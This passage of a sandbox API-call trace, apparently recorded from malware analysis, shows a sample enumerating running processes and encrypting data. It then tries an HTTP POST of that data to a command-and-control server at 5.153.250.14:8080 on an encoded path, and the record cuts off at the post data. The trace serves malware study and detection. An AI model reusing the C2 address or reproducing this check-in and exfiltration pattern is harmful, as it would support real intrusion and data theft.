"ProcessName", + "value": "sppsvc.exe" + }, + { + "name": "ProcessId", + "value": "616" + } + ], + "repeated": 0, + "id": 1661 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7472" + } + ], + "repeated": 0, + "id": 1662 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SppExtComObj.Exe" + }, + { + "name": "ProcessId", + "value": "368" + } + ], + "repeated": 0, + "id": 1663 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "CompatTelRunner.exe" + }, + { + "name": "ProcessId", + "value": "6292" + } + ], + "repeated": 0, + "id": 1664 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3056" + } + ], + "repeated": 0, + "id": 1665 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "8412" + } + ], + "repeated": 0, + "id": 1666 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "8936" + } + ], + "repeated": 0, + "id": 1667 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "8608" + } + ], + "repeated": 0, + "id": 1668 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "8292" + } + ], + "repeated": 0, + "id": 1669 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WmiPrvSE.exe" + }, + { + "name": "ProcessId", + "value": "7260" + } + ], + "repeated": 0, + "id": 1670 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "3937597df70645ac297e.exe" + }, + { + "name": "ProcessId", + "value": "9436" + } + ], + "repeated": 0, + "id": 1671 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "9512" + } + ], + "repeated": 0, + "id": 1672 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WmiPrvSE.exe" + }, + { + "name": "ProcessId", + "value": "9600" + } + ], + "repeated": 0, + "id": 1673 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "9720" + } + ], + "repeated": 0, + "id": 1674 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WmiPrvSE.exe" + }, + { + "name": "ProcessId", + "value": "9756" + } + ], + "repeated": 0, + "id": 1675 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "OneDrive.exe" + }, + { + "name": "ProcessId", + "value": "9972" + } + ], + "repeated": 0, + "id": 1676 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SkypeBackgroundHost.exe" + }, + { + "name": "ProcessId", + "value": "7352" + } + ], + "repeated": 0, + "id": 1677 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "8568" + } + ], + "repeated": 0, + "id": 1678 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MicrosoftEdgeUpdate.exe" + }, + { + "name": "ProcessId", + "value": "7144" + } + ], + "repeated": 0, + "id": 1679 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MicrosoftEdgeUpdate.exe" + }, + { + "name": "ProcessId", + "value": "5208" + } + ], + "repeated": 0, + "id": 1680 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MicrosoftEdgeUpdate.exe" + }, + { + "name": "ProcessId", + "value": "9936" + } + ], + "repeated": 0, + "id": 1681 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "VSSVC.exe" + }, + { + "name": "ProcessId", + "value": "9848" + } + ], + "repeated": 0, + "id": 1682 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "9892" + } + ], + "repeated": 0, + "id": 1683 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "CompatTelRunner.exe" + }, + { + "name": "ProcessId", + "value": "2104" + } + ], + "repeated": 0, + "id": 1684 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "conhost.exe" + }, + { + "name": "ProcessId", + "value": "6720" + } + ], + "repeated": 0, + "id": 1685 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "backgroundTaskHost.exe" + }, + { + "name": "ProcessId", + "value": "2812" + } + ], + "repeated": 0, + "id": 1686 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "10120" + } + ], + "repeated": 0, + "id": 1687 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": false, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1688 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3707", + "parentcaller": "0x03ce461b", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004dc" + } + ], + "repeated": 0, + "id": 1689 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce2f90", + "parentcaller": "0x03ce14ae", + "category": "process", + "api": "NtFreeVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x052ac000" + }, + { + "name": "RegionSize", + "value": "0x00056000" + }, + { + "name": "FreeType", + "value": "0x00004000" + } + ], + "repeated": 0, + "id": 1690 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce2f90", + "parentcaller": "0x03ce14ae", + "category": "process", + "api": "NtFreeVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05292000" + }, + { + "name": "RegionSize", + "value": "0x00002000" + }, + { + "name": "FreeType", + "value": "0x00004000" + } + ], + "repeated": 0, + "id": 1691 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce1bde", + "parentcaller": "0x03ce11f8", + "category": "crypto", + "api": "CryptEncrypt", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptKey", + "value": "0x04e240c0" + }, + { + "name": "CryptHash", + "value": "0x04e24c80" + }, + { + "name": "Buffer", + "value": "\\xa6\\xb5\\xcaCp\\xe2lO\\x10r\\xd9\\x81g\\xd3\\xd1\\xbe\\x8f\\xcc\\x82=\\xc7\\x03:\\xb0t+\\x19\\xe1\\xab\\xa5\\xb6\\xe4X\\x8f\\x86H\\x04\\xe1\\xc6\\x83\\xc2\\x05\\xb8Ln\\xdd\\x10\\xc5\\xf0\\x93\\x97\\x80\\x0e\\x86\\xc5\\x07\\x03\\xf9_\\x07\\xef\\x97j\\xec\\x1a\\x05\\xad\\x19\\xd1\\xd3\\x92\\\\x0f\\xc0\\x9d\\xca\\xcc\\x8a\\xf1\\xd0\\x93=\\xf7\\x00tX7Hw\\x93\\xfc\\x8a\\x90\\xa5\\xb8\\x18\\xf8\\x02\\x95\\x187\\xb4\\xe4\\xb2\\x03S\\xcd\\x14\\x9a@R\\xfe\\x11zl\\xe5\\xf8\\xf7\\xe7\\xc9n7\\xc7J\\x08\\x185\\x8b-\\xf3G\\xdcX\\x02\\xe4\\x008s\\xb2\n\\x10.\\xcf\\xf4H\\xb4\\xdd6dG\\xa4\\x10\\xa6\\x96d\\xf6\\xa7\\xaf\\xc3\\xeatL[\\xe7\\x93\\x1aN\\xff\\x88\\x96\\xdb\\xadn\\x88xLM\\xec\\x93\\xf9\\x8b\\x11:\\x05zvN\\x8b'\\x05\\x8f`\\xdc\\xf7\\xa8\\xd8\\xd79\\x14O\\x01\\xb9\\xde\\xff=\\xd2\\xc8\\x08\\xba\\xc1'\\xcc\\xfdV\\x11\\xd5\\x82gk`\\x8b\\xf8IwYm\\xa0H\\x0f\\x10\\xdc\\x90\\xca\t\\x8c\\x96a^\\x93\\x9aB\\x93\\x1fD\\xab\\xdd\\xc4\\x0e\\xdf\\xa8-F\\xae\\xcaX\\xb1" + }, + { + "name": "Length", + "value": "672" + }, + { + "name": "Final", + "value": "1" + } + ], + "repeated": 0, + "id": 1692 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce1b83", + "parentcaller": "0x03ce11f8", + "category": "crypto", + "api": "CryptExportKey", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptKey", + "value": "0x04e240c0" + }, + { + "name": "Buffer", + "value": "\\x01\\x02\\x00\\x00\\x0ef\\x00\\x00\\x00\\xa4\\x00\\x00\\xb5\\xb2\\xf6k\\xf73\\xea8\\x86\\x9c-\\xfa\\x93\\xcb\\xe9\\xd1\\xea\\xdd\\x1a\\x7f\\x90^d+\\x94\\x0c\\xb8\\xd3\\x9dZ\\x84\\x1d\\xa4O=\\x14\\xe7E\\x8d\\x98?\\x10\\x15\\xc5\\xd59\\xd2\\xf0\\xdfE\\x9cQ=\\xe0`y[F1\\x85\\xc8\\x8f\\x90\\x82\\x9784\\x1e\\xb5\\x01\\xe3,\\xb8m\\x14e\\xef\\xa4\\xb4\\xc2\\xdbq!}\\x0b\\x8f'\\x8b\\xb0]XyBy\\xfap" + }, + { + "name": "BlobType", + "value": "1", + "pretty_value": "SIMPLEBLOB" + }, + { + "name": "Flags", + "value": "0x00000040" + }, + { + "name": "Length", + "value": "108" + } + ], + "repeated": 0, + "id": 1693 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce1c0a", + "parentcaller": "0x03ce11f8", + "category": "crypto", + "api": "CryptDestroyHash", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptHash", + "value": "0x04e24c80" + } + ], + "repeated": 0, + "id": 1694 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce235f", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "ObtainUserAgentString", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "UserAgent", + "value": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)" + } + ], + "repeated": 0, + "id": 1695 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 4, + "id": 1696 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetOpenW", + "status": true, + "return": "0x00cc0004", + "arguments": [ + { + "name": "Agent", + "value": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)" + }, + { + "name": "AccessType", + "value": "0x00000000" + }, + { + "name": "ProxyName", + "value": "" + }, + { + "name": "ProxyBypass", + "value": "" + }, + { + "name": "Flags", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 1697 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce21eb", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetConnectW", + "status": true, + "return": "0x00cc0008", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0004" + }, + { + "name": "ServerName", + "value": "5.153.250.14" + }, + { + "name": "ServerPort", + "value": "8080" + }, + { + "name": "Username", + "value": "" + }, + { + "name": "Password", + "value": "" + }, + { + "name": "Service", + "value": "3" + }, + { + "name": "Flags", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 1698 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce219e", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "HttpOpenRequestW", + "status": true, + "return": "0x00cc000c", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0008" + }, + { + "name": "Path", + "value": "x2TlMmU/iwvTQcb9OvTX4QuVeIW/37kvgQEwswmPg/izIq/" + }, + { + "name": "Flags", + "value": "0x844cc300" + }, + { + "name": "Referrer", + "value": "" + }, + { + "name": "Verb", + "value": "POST" + } + ], + "repeated": 0, + "id": 1699 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce22b8", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 7, + "id": 1700 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x73331eb3", + "parentcaller": "0x73331c87", + "category": "network", + "api": "WinHttpSetOption", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x007154e0" + }, + { + "name": "Option", + "value": "0x0000002d" + }, + { + "name": "Buffer", + "value": "p\\x16*\\x05" + } + ], + "repeated": 0, + "id": 1701 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x7701f645", + "parentcaller": "0x77037a44", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x052ac000" + }, + { + "name": "RegionSize", + "value": "0x00056000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1702 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x7334c060", + "parentcaller": "0x7334b989", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 2, + "id": 1703 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x756b8c89", + "parentcaller": "0x739ecb7a", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004ec" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 1704 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x770225b6", + "parentcaller": "0x77021fc0", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004f4" + } + ], + "repeated": 0, + "id": 1705 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x770225b6", + "parentcaller": "0x77021fc0", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004f8" + } + ], + "repeated": 0, + "id": 1706 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x7335d6d6", + "parentcaller": "0x7338784c", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1707 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x73a35097", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004e8" + } + ], + "repeated": 0, + "id": 1708 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x739f2629", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004e4" + } + ], + "repeated": 0, + "id": 1709 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x73a350ec", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004ec" + } + ], + "repeated": 0, + "id": 1710 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x770225b6", + "parentcaller": "0x770269b6", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004f0" + } + ], + "repeated": 0, + "id": 1711 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x7332ed40", + "parentcaller": "0x7332e70d", + "category": "network", + "api": "GetAddrInfoExW", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Name", + "value": "5.153.250.14" + }, + { + "name": "ServiceName", + "value": "" + } + ], + "repeated": 0, + "id": 1712 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x7337e0ec", + "parentcaller": "0x7337e077", + "category": "network", + "api": "WSASocketW", + "status": true, + "return": "0x000004f0", + "arguments": [ + { + "name": "af", + "value": "2", + "pretty_value": "AF_INET" + }, + { + "name": "type", + "value": "1", + "pretty_value": "SOCK_STREAM" + }, + { + "name": "protocol", + "value": "6", + "pretty_value": "IPPROTO_TCP" + }, + { + "name": "socket", + "value": "1264" + } + ], + "repeated": 0, + "id": 1713 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x76112466", + "parentcaller": "0x7337e84b", + "category": "filesystem", + "api": "NtSetInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004f0" + }, + { + "name": "HandleName", + "value": "\\Device\\Afd" + }, + { + "name": "FileInformationClass", + "value": "41", + "pretty_value": "FileIoStatusBlockRangeInformation" + }, + { + "name": "FileInformation", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1714 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x7705727f", + "parentcaller": "0x77057096", + "category": "filesystem", + "api": "NtSetInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004f0" + }, + { + "name": "HandleName", + "value": "\\Device\\Afd" + }, + { + "name": "FileInformationClass", + "value": "30", + "pretty_value": "FileCompletionInformation" + }, + { + "name": "FileInformation", + "value": "T\\x00\\x00\\x00pot\\x00" + } + ], + "repeated": 0, + "id": 1715 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x7337e17b", + "parentcaller": "0x7337e077", + "category": "network", + "api": "bind", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1264" + }, + { + "name": "ip", + "value": "0.0.0.0" + }, + { + "name": "port", + "value": "0" + } + ], + "repeated": 0, + "id": 1716 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x6db9ac5d", + "parentcaller": "0x7554234d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004f0" + }, + { + "name": "IoControlCode", + "value": "0x0001202f", + "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" + }, + { + "name": "InputBuffer", + "value": "" + }, + { + "name": "OutputBuffer", + "value": "\\x02\\x00\\xc4\\x13\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1717 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x7337e1b7", + "parentcaller": "0x7337e077", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1264" + }, + { + "name": "level", + "value": "0x00000006" + }, + { + "name": "optname", + "value": "0x00000001" + }, + { + "name": "optval", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1718 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x6db8a714", + "parentcaller": "0x7553f4f1", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004f0" + }, + { + "name": "IoControlCode", + "value": "0x000120bf", + "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" + }, + { + "name": "InputBuffer", + "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xe3\\xf3k\\x05\\x01\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 1719 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x6db8a714", + "parentcaller": "0x7553f4f1", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004f0" + }, + { + "name": "IoControlCode", + "value": "0x000120bf", + "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" + }, + { + "name": "InputBuffer", + "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00\\x88\\xf3k\\x05\\x08\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 1720 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x7337e233", + "parentcaller": "0x7337e077", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1264" + }, + { + "name": "level", + "value": "0x0000ffff" + }, + { + "name": "optname", + "value": "0x00001002" + }, + { + "name": "optval", + "value": "\\x00\\x00\\x04\\x00" + } + ], + "repeated": 0, + "id": 1721 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "8196", + "caller": "0x7337dc91", + "parentcaller": "0x7337db66", + "category": "network", + "api": "ConnectEx", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1264" + }, + { + "name": "SendBuffer", + "value": "" + }, + { + "name": "ip", + "value": "5.153.250.14" + }, + { + "name": "port", + "value": "8080" + } + ], + "repeated": 0, + "id": 1722 + }, + { + "timestamp": "2025-03-07 22:34:37,391", + "thread_id": "6332", + "caller": "0x7335afe3", + "parentcaller": "0x756dd613", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 3, + "id": 1723 + }, + { + "timestamp": "2025-03-07 22:34:37,391", + "thread_id": "6332", + "caller": "0x73389bd2", + "parentcaller": "0x7332eeb2", + "category": "network", + "api": "closesocket", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1264" + } + ], + "repeated": 0, + "id": 1724 + }, + { + "timestamp": "2025-03-07 22:34:37,391", + "thread_id": "6332", + "caller": "0x77057a99", + "parentcaller": "0x75122407", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1725 + }, + { + "timestamp": "2025-03-07 22:34:37,391", + "thread_id": "6332", + "caller": "0x7512104c", + "parentcaller": "0x7511e3b8", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 7, + "id": 1726 + }, + { + "timestamp": "2025-03-07 22:34:37,391", + "thread_id": "9440", + "caller": "0x03ce22b8", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "HttpSendRequestW", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "RequestHandle", + "value": "0x00cc000c" + }, + { + "name": "Headers", + "value": "Referer: http://5.153.250.14/x2TlMmU/iwvTQcb9OvTX4QuVeIW/37kvgQEwswmPg/izIq/\r\nContent-Type: multipart/form-data; boundary=---------------------------435448455781181\r\n" + }, + { + "name": "PostData", + "value": 